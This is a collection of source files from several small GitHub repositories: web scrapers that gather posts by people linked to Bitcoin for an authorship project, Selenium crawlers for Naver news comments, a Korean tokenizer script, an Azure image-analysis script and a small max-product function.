w[\"id\"]))\n '''\n\n print(\"done.\", flush=True)\n\n random.shuffle(output)\n\n with open(args.out_filename, 'w+') as f:\n f.write(\"// Metadata\\n\")\n f.write(json.dumps(metadata) + \"\\n\\n\")\n f.write(\"// (sentence, author_id, work_id)\\n\")\n for o in output:\n f.write(str(o) + \"\\n\")\n\n"
},
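The `--chunk_size` branch is the interesting one: it flattens a work into lowercase word tokens and emits fixed-length chunks plus a shorter trailing remainder. The core loop, isolated and runnable (the sample text is illustrative):

```python
from keras.preprocessing import text

def word_chunks(raw, chunk_size):
    # Tokenize, then slice into chunk_size-word windows.
    words = text.text_to_word_sequence(raw)
    while len(words) >= chunk_size:
        yield " ".join(words[:chunk_size])
        words = words[chunk_size:]
    if words:
        yield " ".join(words)  # trailing partial chunk

print(list(word_chunks("to be or not to be that is the question", 4)))
# ['to be or not', 'to be that is', 'the question']
```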
{
"alpha_fraction": 0.5307262539863586,
"alphanum_fraction": 0.7094972133636475,
"avg_line_length": 16.899999618530273,
"blob_id": "76dce793a10d0a71db5aecae6484e72d00869e39",
"content_id": "fad0a47692845df0d8c5022f2fae112569c850f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 10,
"path": "/data/satoshi/requirements.txt",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "html2text==2018.1.9\nmercury-parserpy==0.4\npraw==5.3.0\npy-backwards==0.7\npyquery==1.4.0\nrequests==2.18.4\nrequests-html==0.6.6\npython-dotenv==0.8.2\npython-slugify==1.2.4\nclick==6.7\n"
},
{
"alpha_fraction": 0.6512096524238586,
"alphanum_fraction": 0.6542338728904724,
"avg_line_length": 30,
"blob_id": "bed01a5de7a201b70e5adb8b4bc3e1468eab6015",
"content_id": "0583a58d3e3b3c29c86a3c22d503b1a25daf8cdd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 992,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 32,
"path": "/data/satoshi/download-reddit-user.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport praw\nimport os\n\nfrom slugify import slugify\nfrom itertools import filterfalse\nfrom dotenv import load_dotenv, find_dotenv\n\ndef process_comment(source):\n lines = source.splitlines()\n lines = filterfalse(lambda x: x.startswith('>'), lines)\n return '\\n'.join(lines)\n\nif __name__ == \"__main__\":\n load_dotenv(find_dotenv())\n parser = argparse.ArgumentParser()\n parser.add_argument('user', help='The Reddit user')\n args = parser.parse_args()\n\n r = praw.Reddit(client_id=os.environ['REDDIT_CLIENT_ID'],\n client_secret=os.environ['REDDIT_CLIENT_SECRET'],\n user_agent='Reddit User Scraper (/u/varunramesh)')\n\n user = r.redditor(args.user)\n count = 0\n for comment in user.comments.new(limit=None):\n url = 'https://reddit.com' + comment.permalink\n with open(slugify(url) + \".txt\", \"wb\") as f:\n f.write(process_comment(comment.body).encode('utf8'))\n count += 1\n\n print(count, \"posts downloaded...\")\n"
},
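`process_comment` keeps only the author's own words by dropping Markdown quote lines. A self-contained check on an invented comment:

```python
from itertools import filterfalse

def process_comment(source):
    lines = source.splitlines()
    lines = filterfalse(lambda x: x.startswith('>'), lines)
    return '\n'.join(lines)

sample = "> what about fees?\nFees stay low while blocks have room.\n> sure?\nYes."
print(process_comment(sample))
# Fees stay low while blocks have room.
# Yes.
```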
{
"alpha_fraction": 0.5865224599838257,
"alphanum_fraction": 0.5948419570922852,
"avg_line_length": 26.31818199157715,
"blob_id": "fb73cb909a64137c08810f44fc0889cbade6dc43",
"content_id": "30fe23435b6fb69608213ba4a14d5f3da8bf5e39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1202,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 44,
"path": "/data/satoshi/download-bitcoin-talk.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import html2text\nimport argparse\nimport time\n\nfrom requests_html import HTMLSession\nfrom slugify import slugify\nfrom pyquery import PyQuery as pq\n\ndef process_post(post_html):\n post = pq(post_html)\n post.remove('div.quoteheader')\n post.remove('div.quote')\n return post.html(method='html')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('url', help='The Profile url.')\n args = parser.parse_args()\n\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n session = HTMLSession()\n\n cursor = 0\n while True:\n url = args.url + ';sa=showPosts;start=' + str(cursor)\n print(\"Crawling\", url)\n r = session.get(url)\n td = r.html.find('#bodyarea td', first=True)\n posts = td.find('table[cellpadding=\"0\"]')\n\n for post in posts:\n url = post.find('.middletext a')[-1].attrs['href']\n content = post.find('.post', first=True).html\n with open(slugify(url) + \".txt\", \"wb\") as f:\n f.write(h.handle(process_post(content)).encode('utf8'))\n\n cursor += len(posts)\n\n time.sleep(5)\n if len(posts) < 20:\n break\n"
},
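`process_post` removes quoted material before html2text runs, so a reply does not inherit the words of the person being quoted. A small illustration with simplified BitcoinTalk markup:

```python
from pyquery import PyQuery as pq

def process_post(post_html):
    post = pq(post_html)
    post.remove('div.quoteheader')
    post.remove('div.quote')
    return post.html(method='html')

html = ('<div class="post">'
        '<div class="quoteheader">Quote from: alice</div>'
        '<div class="quote">earlier message</div>'
        'My actual reply.</div>')
print(process_post(html))  # only 'My actual reply.' survives
```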
{
"alpha_fraction": 0.6360177397727966,
"alphanum_fraction": 0.6391883492469788,
"avg_line_length": 39.43589782714844,
"blob_id": "962892a1f4f6bf95101a88825972f42f0c2d9473",
"content_id": "064db23d8850a2cb109e2edfec1f2cf701d4b6bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 39,
"path": "/data/satoshi/download-satoshi.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import requests\nimport html2text\n\nfrom itertools import filterfalse\nfrom pyquery import PyQuery as pq\n\ndef process_email(email):\n lines = email.splitlines()\n\n lines = filterfalse(lambda x: x == 'Satoshi Nakamoto' or x == 'Satoshi', lines)\n lines = filterfalse(lambda x: x == '---------------------------------------------------------------------', lines)\n lines = filterfalse(lambda x: x == 'The Cryptography Mailing List', lines)\n lines = filterfalse(lambda x: x.startswith('Unsubscribe by sending \"unsubscribe cryptography\" to'), lines)\n\n lines = filterfalse(lambda x: x.startswith('>'), lines)\n lines = filterfalse(lambda x: x.endswith('wrote:'), lines)\n return '\\n'.join(lines)\n\ndef process_post(post_html):\n post = pq(post_html)\n post.remove('div.quoteheader')\n post.remove('div.quote')\n return post.html(method='html')\n\nif __name__ == \"__main__\":\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n emails = requests.get('https://raw.githubusercontent.com/NakamotoInstitute/nakamotoinstitute.org/master/data/satoshiemails.json').json()\n\n for i, email in enumerate(emails['emails']):\n with open(\"email-%d.txt\" % i, \"wb\") as f:\n f.write(process_email(email['Text']).encode('utf8'))\n\n posts = requests.get('https://raw.githubusercontent.com/NakamotoInstitute/nakamotoinstitute.org/master/data/satoshiposts.json').json()\n for i, post in enumerate(posts['posts']):\n with open(\"post-%d.txt\" % i, \"wb\") as f:\n f.write(h.handle(process_post(post['post'])).encode('utf8'))\n"
},
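`process_email` strips signatures, the mailing-list footer, and quoted lines before each email is written out. A quick check one could append at the bottom of the script above (the email body is invented for illustration):

```python
sample = ("> Have you thought about this attack?\n"
          "The proof-of-work chain is how the network decides.\n"
          "Satoshi Nakamoto\n"
          "The Cryptography Mailing List")
print(process_email(sample))
# The proof-of-work chain is how the network decides.
```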
{
"alpha_fraction": 0.6431095600128174,
"alphanum_fraction": 0.6908127069473267,
"avg_line_length": 33.632652282714844,
"blob_id": "37d6f852884564d1e9761473a358d9054859e299",
"content_id": "b6722f4481bbdaf71c9b2ce08e058b6a09ebc098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1698,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 49,
"path": "/data/satoshi/README.md",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "Gavin Andresen\n- [x] http://gavinandresen.ninja/feed\n- [x] http://feeds.feedburner.com/Gavinthink\n- [x] https://bitcointalk.org/index.php?action=profile;u=224\n- [x] https://www.reddit.com/user/gavinandresen\n- [ ] https://twitter.com/gavinandresen\n\nRoger Ver\n- [x] https://bitcointalk.org/index.php?action=profile;u=10310\n- [x] https://www.reddit.com/user/MemoryDealers/\n- [ ] https://twitter.com/rogerkver\n\nHal Finney\n- [x] https://bitcointalk.org/index.php?action=profile;u=2436\n- [x] https://web.archive.org/web/20140403012916/finney.org/~hal/\n- [x] http://nakamotoinstitute.org/finney/\n- [x] Cypherpunks Mailing List - `Hal <[email protected]>`, `Hal <[email protected]>`, `Hal Finney <[email protected]>`\n- [ ] https://twitter.com/halfin\n\nJed McCaleb\n- [x] https://bitcointalk.org/index.php?action=profile;u=5322\n- [x] https://www.reddit.com/user/Swamp12\n- [x] https://news.ycombinator.com/user?id=swamp12\n- [ ] https://twitter.com/JedMcCaleb\n\nNick Szabo\n- [x] https://unenumerated.blogspot.com/feeds/posts/default\n- [x] https://web.archive.org/web/20160930093313/http://szabo.best.vwh.net/\n- [x] Cypherpunks Mailing List - `[email protected] (Nick Szabo)`\n- [ ] https://twitter.com/NickSzabo4\n\nCraig Steven Wright\n- [x] https://web.archive.org/web/20160502071722/http://www.drcraigwright.net/\n- [x] https://www.reddit.com/user/Craig_S_Wright\n- [ ] https://theconversation.com/profiles/craig-s-wright-3334/\n- [ ] https://web.archive.org/web/20120316093712/http://gse-compliance.blogspot.com/\n\nDorian Nakamoto\n- [x] https://www.reddit.com/user/DSPNakamoto\n\nDavid Mazieres\n- [x] https://news.ycombinator.com/user?id=mazieres\n- [x] Cypherpunks Mailing List - `David Mazieres <[email protected]>`, `David Mazieres <[email protected]>`\n\nWei Dai\n- [x] http://lesswrong.com/user/Wei_Dai/\n\nMicheal Clear\n- [ ] http://ciphron.netsoc.ie/\n"
}
] | 16 |
khost95/SSIP-2020-Project-Butterfly | https://github.com/khost95/SSIP-2020-Project-Butterfly | 85efd86d8ebfd8d50b2d3cbab3af1fbacda31bc4 | 3f2b72f8d6da0f3252c77e15f552d26c4a8b7816 | 0111d4b818138b4e4532b92c21ed2eeba79afac0 | refs/heads/master | 2022-11-21T04:55:08.166188 | 2020-07-17T10:39:27 | 2020-07-17T10:39:27 | 280,361,998 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8068965673446655,
"alphanum_fraction": 0.8206896781921387,
"avg_line_length": 142,
"blob_id": "47cd7b723b70edaf61d257697803e12a40a0a382",
"content_id": "bc3818c30297b2f04565c2ea4ea168169b45638b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 1,
"path": "/Butterfly_Classification/ReadME.txt",
"repo_name": "khost95/SSIP-2020-Project-Butterfly",
"src_encoding": "UTF-8",
"text": "The dataset used,the weights and the script you can find on https://drive.google.com/file/d/1gFkZxYTcmYICyMcNseNYLahLLw6fCyYQ/view?usp=sharing \r\n"
},
{
"alpha_fraction": 0.7682926654815674,
"alphanum_fraction": 0.8170731663703918,
"avg_line_length": 161,
"blob_id": "f2728ed8dd8729328265b8f9c750bad3638c38aa",
"content_id": "df2889cf70aef8906153343b6120c31e0c322b93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 1,
"path": "/Created_datasets/ReadMe.txt",
"repo_name": "khost95/SSIP-2020-Project-Butterfly",
"src_encoding": "UTF-8",
"text": "The created datasets: background images, synthset1, synthset2, you can find on https://drive.google.com/file/d/1cdKRS4H70frrthp8dCwI_WGQPvy1RSRS/view?usp=sharing \r\n"
},
{
"alpha_fraction": 0.7436061501502991,
"alphanum_fraction": 0.7448849081993103,
"avg_line_length": 33.75555419921875,
"blob_id": "25ea5af5cd1c0bfed82f75371c59df1ce41d11f7",
"content_id": "55bd069a6d3cdd803b8d56de685990d59b123d09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1564,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 45,
"path": "/Azure_results/butterfly.py",
"repo_name": "khost95/SSIP-2020-Project-Butterfly",
"src_encoding": "UTF-8",
"text": "# Libraries for processing pictures\nimport os\nimport sys\nimport requests\nimport json\nimport pathlib\n\n# Check Microsoft Azure settings\nif 'COMPUTER_VISION_SUBSCRIPTION_KEY' in os.environ:\n subscription_key = os.environ['COMPUTER_VISION_SUBSCRIPTION_KEY']\nelse:\n print(\"\\nSet the COMPUTER_VISION_SUBSCRIPTION_KEY environment variable.\\n**Restart your shell or IDE for changes to take effect.**\")\n sys.exit()\n\nif 'COMPUTER_VISION_ENDPOINT' in os.environ:\n endpoint = os.environ['COMPUTER_VISION_ENDPOINT']\n\nanalyze_url = endpoint + \"vision/v3.0/analyze\"\n\n\n# Which folder to check\nmyFolder = pathlib.Path('process')\n# Search pattern for PNG pictures\nmyPattern = \"*.png\"\n\nfor myFile in myFolder.glob(myPattern):\n\tmyReport = str(myFile) + '.txt'\n\tprint('Processing: ' + str(myFile) + ' report: ' + myReport)\n\t# Read file into variable image_data, read options: binary\n\tmyPicture = open(myFile, \"rb\")\n\timage_data = myPicture.read()\n\tmyPicture.close()\n\t# Setup HTTP headers\n\theaders = {'Ocp-Apim-Subscription-Key': subscription_key,'Content-Type':'application/octet-stream'}\n\tparams = {'visualFeatures': 'Objects'}\n\tresponse = requests.post(analyze_url, headers=headers, params=params, data=image_data)\n\tresponse.raise_for_status()\n\t# The 'analysis' object contains various fields that describe the image. The most\n\t# relevant caption for the image is obtained from the 'description' property.\n\tanalysis = response.json()\n\t# Save all report into text file\n\tmySaveFile = open(myReport, 'w')\n\tjson.dump(analysis, mySaveFile)\n\tmySaveFile.close()\n\tprint(analysis)\n"
}
] | 3 |
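Since the Azure script above requests only the `Objects` visual feature, each saved `*.png.txt` report is JSON whose detections live under `objects`. A sketch of reading one report back (the file name is hypothetical; field names follow the Computer Vision v3.0 response schema):

```python
import json

with open('process/example.png.txt') as f:
    analysis = json.load(f)

# Each detection has a label, a confidence, and a bounding box.
for obj in analysis.get('objects', []):
    r = obj['rectangle']
    print(obj['object'], obj['confidence'], (r['x'], r['y'], r['w'], r['h']))
```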
aprilgom/cmtvser | https://github.com/aprilgom/cmtvser | 34613ecd8eb69829957ed000fa0a5efbdb2db9d2 | d431d3a3f7f1c4d05c673fd249ec812f456fe4e7 | 4e1e70bce748aa1b40cd803fe4f0b59210b7a452 | refs/heads/master | 2021-07-07T08:28:31.609975 | 2021-02-08T23:15:06 | 2021-02-08T23:15:06 | 226,097,313 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 13,
"blob_id": "354fc8b155d68d0b1f9cb14b21dc47b993e01b18",
"content_id": "1864913dafc4f162fcedb38911a66d772884335b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 3,
"path": "/README.md",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "# cmtvser\n셀레니움 유튜브 댓글 수집,\nkonlpy로 형태소 분석.\n"
},
{
"alpha_fraction": 0.7293532490730286,
"alphanum_fraction": 0.7492537498474121,
"avg_line_length": 32.5,
"blob_id": "f7628e36ef17af5e772ca9d5bd238f8fa402a2b3",
"content_id": "24286bb4e79926fd1acee435db89a5b868f1c26a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2010,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 60,
"path": "/comment_crawl.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import ElementNotInteractableException\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom os import path\n\ndef naver(url):\n\n\toptions = webdriver.ChromeOptions()\n\n\toptions.add_argument('headless')\n\t#options.add_argument('window-size=1920x1080')\n\t#options.add_argument(\"disable-gpu\")\n\n\toptions.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\n\toptions.add_argument(\"lang=ko_KR\")\n\n\tchromedriver = path.expandvars(r'%LOCALAPPDATA%\\Programs\\Python\\chromedriver.exe')\n\tdriver = webdriver.Chrome(chromedriver,chrome_options=options)\n\tdriver.get(url)\n\t\n\ttry:\n\t\tdriver.find_element_by_xpath('//*[@id=\"cbox_module\"]/div/div/a[1]').click()\n\texcept Exception as e:\n\t\tprint('exception',e)\n\ttry:\n\t\tview_com_btn = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME, 'u_cbox_btn_view_comment')))\n\t\tview_com_btn.click()\n\texcept Exception as e:\n\t\tprint('exception',e)\n\tis_see_more = True\n\tsee_more_btn = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '#cbox_module > div > div.u_cbox_paginate > a')))\n\twhile is_see_more:\n\t\ttry:\n\n\t\t\tsee_more_btn.click()\n\n\t\texcept NoSuchElementException as e:\n\t\t\tprint('exception',e)\n\t\t\tis_see_more = False\n\t\texcept ElementNotInteractableException as e:\n\t\t\tprint('exception',e)\n\t\t\tis_see_more = False\n\t\texcept ElementClickInterceptedException as e:\n\t\t\tprint('exception',e)\n\n\tres = driver.find_elements_by_class_name('u_cbox_contents')\n\tret = []\n\tfor cmts in res:\n\t ret.append(cmts.text)\n\tdriver.close()\n\t#res = driver.find_element_by_xpath('.//*[@class=\\\"u_cbox_contents\\\"]')\n\n\treturn ret\n\n#\n"
},
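`naver()` hides the Selenium plumbing and hands back the comment bodies as a plain list of strings, so a caller only needs an article URL (the one below is a placeholder):

```python
import comment_crawl

comments = comment_crawl.naver('https://news.naver.com/main/read.nhn?...')
print(len(comments), 'comments collected')
for c in comments[:5]:
    print('-', c)
```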
{
"alpha_fraction": 0.7126718759536743,
"alphanum_fraction": 0.7391945123672485,
"avg_line_length": 34.71929931640625,
"blob_id": "78d0d03bcccf39b0693a5b82628485a6ee3f52f9",
"content_id": "9715c78f6793bacf19871b447ae36bf6e1c24a9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2042,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 57,
"path": "/sele_comment_crawl.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import ElementNotInteractableException\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom os import path\n\n\noptions = webdriver.ChromeOptions()\n\noptions.add_argument('headless')\n#options.add_argument('window-size=1920x1080')\n#options.add_argument(\"disable-gpu\")\n\noptions.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\noptions.add_argument(\"lang=ko_KR\") # 한국어!\n\nchromedriver = path.expandvars(r'%LOCALAPPDATA%\\Programs\\Python\\chromedriver.exe')\ndriver = webdriver.Chrome(chromedriver,chrome_options=options)\nurl = \"\"\n\ndriver.get(\"https://news.naver.com/main/ranking/popularDay.nhn?rankingType=popular_day§ionId=100&date=20191030\")\n\ndriver.find_element_by_xpath('//*[@id=\"wrap\"]/table/tbody/tr/td[2]/div/div[4]/ol/li[1]/div[2]/div[1]/a').click()\n\ndriver.find_element_by_xpath('//*[@id=\"cbox_module\"]/div/div/a[1]').click()\n\nis_see_more = True\nsee_more_button = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '#cbox_module > div > div.u_cbox_paginate > a')))\nwhile is_see_more:\n try:\n\n see_more_button.click()\n\n except NoSuchElementException as e:\n print('exception',e)\n is_see_more = False\n except ElementNotInteractableException as e:\n print('exception',e)\n is_see_more = False\n except ElementClickInterceptedException as e:\n print('exception',e)\n\nres = driver.find_elements_by_class_name('u_cbox_contents')\n#res = driver.find_element_by_xpath('.//*[@class=\\\"u_cbox_contents\\\"]')\nfor com in res:\n print(com.text)\n#f = open(\"comments_naver.txt\",'w')\n#f.write(res.text);\n#f.close();\n\n\n\n#driver.close()\n"
},
{
"alpha_fraction": 0.6959937214851379,
"alphanum_fraction": 0.7124902009963989,
"avg_line_length": 31.227848052978516,
"blob_id": "1c73d9a67831c97f4803b06cf2c037185ea6d862",
"content_id": "d74e8da03cb4c44d85d8ed68dc197a86b4ea10cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2546,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 79,
"path": "/crawl_linux.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import ElementNotInteractableException\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom os import path\ndef cr_sele_init():\n global driver\n\toptions = webdriver.ChromeOptions()\n\n\toptions.add_argument('headless')\n\t#options.add_argument('window-size=1920x1080')\n\t#options.add_argument(\"disable-gpu\")\n\n\toptions.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\n\toptions.add_argument(\"lang=ko_KR\")\n\n\tchromedriver = path.expandvars('./chromedriver')\n\tdriver = webdriver.Chrome(chromedriver,chrome_options=options)\n\ndef cr_NaverNewsCmt(url): \n global driver\n\tdriver.get(url)\n\n\ttry:\n\t\tdriver.find_element_by_xpath('//*[@id=\"cbox_module\"]/div/div/a[1]').click()\n\texcept Exception as e:\n\t\tprint('exception',e)\n\ttry:\n\t\tview_com_btn = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME, 'u_cbox_btn_view_comment')))\n\t\tview_com_btn.click()\n\texcept Exception as e:\n\t\tprint('exception',e)\n\tis_see_more = True\n\tsee_more_btn = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '#cbox_module > div > div.u_cbox_paginate > a')))\n\twhile is_see_more:\n\t\ttry:\n\n\t\t\tsee_more_btn.click()\n\n\t\texcept NoSuchElementException as e:\n\t\t\tprint('exception',e)\n\t\t\tis_see_more = False\n\t\texcept ElementNotInteractableException as e:\n\t\t\tprint('exception',e)\n\t\t\tis_see_more = False\n\t\texcept ElementClickInterceptedException as e:\n\t\t\tprint('exception',e)\n\n\tres = driver.find_elements_by_class_name('u_cbox_contents')\n\tret = []\n\tfor cmts in res:\n\t ret.append(cmts.text)\n\t#res = driver.find_element_by_xpath('.//*[@class=\\\"u_cbox_contents\\\"]')\n\n\treturn ret\n\ndef cr_DaumNewsCmt(url): \n global driver\n driver.get(url)\n is_see_more = True \n \n while is_see_more:\n \ttry:\n \t driver.find_element_by_css_selector('#alex-area > div > div > div > div.cmt_box > div.alex_more > a')\n \texcept Exception as e:\n \t print('exception',e)\n \t is_see_more = False\n res = driver.find_elements_by_class_name('desc_txt font_size_17') \n ret = []\n for cmts in res:\n ret.append(cmts.text)\n return ret \n\ndef cr_sele_close():\n driver.close()\n"
},
{
"alpha_fraction": 0.6445086598396301,
"alphanum_fraction": 0.736994206905365,
"avg_line_length": 33.599998474121094,
"blob_id": "f96aeef2b138dda740b0648a9276c8781ce46507",
"content_id": "1605aa9b2bfbe5120c83d24933fedbd41bad6825",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 10,
"path": "/crawl.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "import crawl_linux as comcr\n\n\ncomments = comcr.cr_NaverNewsCmt(\"https://news.naver.com/main/ranking/read.nhn?mid=etc&sid1=111&rankingType=popular_day&oid=215&aid=0000819819&date=20191029&type=1&rankingSeq=2&rankingSectionId=100\")\ncomcr.cr_sele_close()\nf = open(\"comments.txt\",'w',-1,\"utf-8\")\nfor cmt in comments:\n f.write(cmt+\"\\n\")\n\nf.close()\n"
},
{
"alpha_fraction": 0.5790753960609436,
"alphanum_fraction": 0.5936739444732666,
"avg_line_length": 20.578947067260742,
"blob_id": "eb0541ca9ee43f93c996e244289ead538cc4e160",
"content_id": "e282e216077986ebe48c38e6b7036772d93c70de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 411,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 19,
"path": "/hyeongtae.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "\nfrom konlpy.tag import Komoran\n\ndef hyeongtae(filename):\n\ttokenizer = Komoran()\n\ttok_comments = []\n\tf = open(filename+\".txt\",'r+',-1,\"utf-8\")\n\n\tcomments = f.read().splitlines()\n\tf.close()\n\tg = open(\"tok\"+filename+\".txt\",'w',-1,\"utf-8\")\n\tfor com in comments:\n\t\ttok_com_l = tokenizer.morphs(com)\n\t\ti = 0\n\t\tfor tok in tok_com_l:\n\t\t\tg.write(tok)\n\t\t\ti+=1\n\t\t\tif i != len(tok_com_l):\n\t\t\t\tg.write(\" \")\n\t\tg.write(\"\\n\")\n"
},
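`hyeongtae('comments')` reads `comments.txt` and writes one space-joined morpheme sequence per line to `tokcomments.txt`. The underlying Komoran call looks like this; exact tokens depend on the installed dictionary, so the output shown is indicative:

```python
from konlpy.tag import Komoran

tokenizer = Komoran()
print(tokenizer.morphs('아버지가 방에 들어가신다'))
# e.g. ['아버지', '가', '방', '에', '들어가', '시', 'ㄴ다']
```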
{
"alpha_fraction": 0.6650164723396301,
"alphanum_fraction": 0.6864686608314514,
"avg_line_length": 20.64285659790039,
"blob_id": "834f75731d4dcde27dd644f94efdd21d51da8072",
"content_id": "e6ebc2c1e7cde5b29aab7c2ab2a4d1050e347d66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 606,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 28,
"path": "/article_comment_crawl.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "import requests\nfrom requests import get\nfrom bs4 import BeautifulSoup\n\nreq = requests.get('https://news.naver.com/main/ranking/popularDay.nhn?rankingType=popular_day§ionId=100&date=20191029')\nhtml = req.text\nreq.close()\nif req.ok:\n print('ok')\nelse:\n print('failed')\n\nsoup = BeautifulSoup(html,'html.parser')\n\nrankings_list = soup.select(\n 'div.ranking_headline'\n)\nprint(ranking_list)\n\n\nf = open(\"a.html\",'w')\nf.write(html)\nf.close()\ndef download(url):\n file_name = url.split('/')[-1]\n with open(file_name,\"wb\") as file:\n response = get(url)\n file.write(response.content)\n"
}
] | 7 |
zhrmrz/max_prod | https://github.com/zhrmrz/max_prod | 6894b7c1ac584764f8030c01f21e099a58918852 | 630da8a256f69ba65c959555011e500a0e15df03 | f11743eeafc0185e935db903623c4dfa2a953e84 | refs/heads/master | 2022-09-11T17:24:13.400119 | 2020-05-30T19:55:37 | 2020-05-30T19:55:37 | 268,149,888 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.36571428179740906,
"alphanum_fraction": 0.4285714328289032,
"avg_line_length": 29.882352828979492,
"blob_id": "add93ee3d7db4fc723e4993f8b1ffe102dde2747",
"content_id": "f49674cbb53be0319dc4941d91a041843654c832",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 17,
"path": "/max_prod.py",
"repo_name": "zhrmrz/max_prod",
"src_encoding": "UTF-8",
"text": "class Sol:\n def max_prod(self,arr):\n s_arr=sorted(arr)\n if (s_arr[0]>=0):\n return s_arr[-1]*s_arr[-2]*s_arr[-3]\n elif s_arr[1]>=0:\n return s_arr[-1] * s_arr[-2] * s_arr[-3]\n elif s_arr[-1]<0:\n return s_arr[0] * s_arr[1] * s_arr[2]\n elif s_arr[-1]==0:\n return 0\n else:\n return max(s_arr[-1]*s_arr[-2]*s_arr[-3],s_arr[0] * s_arr[1]*s_arr[-1])\n\nif __name__ == '__main__':\n p=Sol()\n print(p.max_prod([1,4,8,2,-10,-9,-11]))\n"
}
] | 1 |
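A few spot checks for the `max_prod` above, appended after the class; the all-negative case is the one the two-candidate formula must get right (expected values worked by hand):

```python
p = Sol()
assert p.max_prod([1, 4, 8, 2, -10, -9, -11]) == 880  # (-11) * (-10) * 8
assert p.max_prod([1, 2, 3, 4]) == 24                 # 2 * 3 * 4
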